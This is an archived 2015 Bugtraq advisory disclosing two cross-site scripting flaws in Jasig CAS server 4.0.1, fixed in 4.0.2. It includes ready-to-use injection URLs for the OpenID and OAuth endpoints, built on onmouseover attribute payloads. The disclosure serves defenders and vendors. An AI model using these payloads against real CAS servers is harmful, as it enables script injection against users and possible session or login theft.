| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-id: <55FFFDD6.2060803@pwr.edu.pl> Date: Mon, 21 Sep 2015 14:53:42 +0200 From: Antoni Klajn <antoni.d.klajn@....edu.pl> To: bugtraq@...urityfocus.com Subject: Jasig CAS server vulnerabilities Hi, Jasig CAS server version 4.0.1 is prone to xss vulnerabilities Timeline: 20.02.2015 - Vendor notified 11.05.2015 - Patches released 21.09.2015 - Bugtraq disclosure Vulnerable version: 4.0.1 Fixed version: 4.0.2 Vulnerabilities details: 1) XSS in OpenID server Obtain method: Paste thi url https://oauth.example.com/cas/openid/username"[new line]onmouseover="jscode in OpenID client and try to log in. space char is not allowed, you can use new line Example redirection link https://oauth.example.com/cas/login?openid.assoc_handle=1422619970824-0&openid.ax.mode=fetch_request&openid.ax.required=email&openid.ax.type.email=http%3A%2F%2Fschema.openid.net%2Fcontact%2Femail&openid.identity=https%3A%2F%2Foauth.example.com%2Fcas%2Fopenid%2Fusername%22&openid.mode=checkid_setup&openid.return_to=https%3A%2F%2Fclien.example.com%2Faccount%2Fsignin%2Fcomplete%2F%3Fnext%3D%252F%26janrain_nonce%3D2015-09-21T11%253A15%253A10ZiTDjrd%26openid1_claimed_id%3Dhttps%253A%252F%252Foauth.example.com%252Fcas%252Fopenid%252Fusername%2527&openid.trust_root=https%3A%2F%2Fclient.example.com%2F Result <input type="hidden" id="username" name="username" value="username" onmouseover="jscode" /> 2) XSS in OAuth server Example link https://oauth.example.com/cas/oauth2.0/authorize?client_id=<client_id>&redirect_uri="onmouseover=alert(1)%20.trusted-domain.com
Powered by blists - more mailing lists